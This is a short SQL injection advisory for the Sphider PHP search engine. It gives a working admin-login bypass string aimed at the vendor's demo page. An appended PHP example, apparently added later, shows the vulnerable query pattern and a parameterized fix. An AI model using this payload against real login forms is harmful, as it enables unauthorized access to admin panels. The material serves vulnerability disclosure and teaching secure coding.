Sphider SQL injection vulnerabilities

Vendor: www.sphider.eu
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork: © Ando Saabas 2005-2007

Description of Sphider

Sphider is a lightweight web spider and search engine written in PHP, using MySQL as its back-end database. It is a great tool for adding search functionality to your web site or building your custom search engine. Sphider is small, easy to set up and modify, and is used in thousands of websites across the world.

Exploits: SQLi vulnerability

An attacker can use the authentication bypass to get into the admin panel in the http://www.sphider.eu/demo.php section of the site.

Exploit:

Username: ' or 0=0 #
Password: ' or 0=0 #

--------------------------------------------------------------------------------
Tribute to side^effects and love to taashu.
--------------------------------------------------------------------------------
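
A bypass of this kind works when the login fields are concatenated into the SQL text. The PHP below is an added illustration, not Sphider's source and not code from the advisory's author; it contrasts that pattern with a parameterized check. The `admins` table, its columns, the function names and the sample password are assumptions, and an in-memory SQLite database (pdo_sqlite) stands in for MySQL so the hardened path runs offline.

```php
<?php
// Added example: hypothetical admin login check, not Sphider's own code.
// Table/column names (admins, username, pass_hash) are assumptions.

// Vulnerable pattern: user input is concatenated into the SQL text,
// so a quote in the input changes the structure of the statement.
function build_login_query_vulnerable(string $user, string $pass): string
{
    return "SELECT id FROM admins WHERE username = '$user' AND password = '$pass'";
}

// Hardened pattern: a placeholder keeps input out of the SQL grammar, and
// the password is compared against a stored hash outside the query.
function login_hardened(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();          // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pass_hash TEXT)');
$ins = $db->prepare('INSERT INTO admins (username, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

$payload = "' or 0=0 #";                   // the input quoted in the advisory

// In MySQL '#' starts a comment, so the text after it is ignored and the
// WHERE clause reduces to: username = '' or 0=0, which is true for every row.
echo build_login_query_vulnerable($payload, $payload), "\n";

// With the placeholder, the same input is only a literal username that
// matches no row, so the login is rejected.
var_dump(login_hardened($db, $payload, $payload));
var_dump(login_hardened($db, 'admin', $payload));
var_dump(login_hardened($db, 'admin', 'constructed-sample-password'));
```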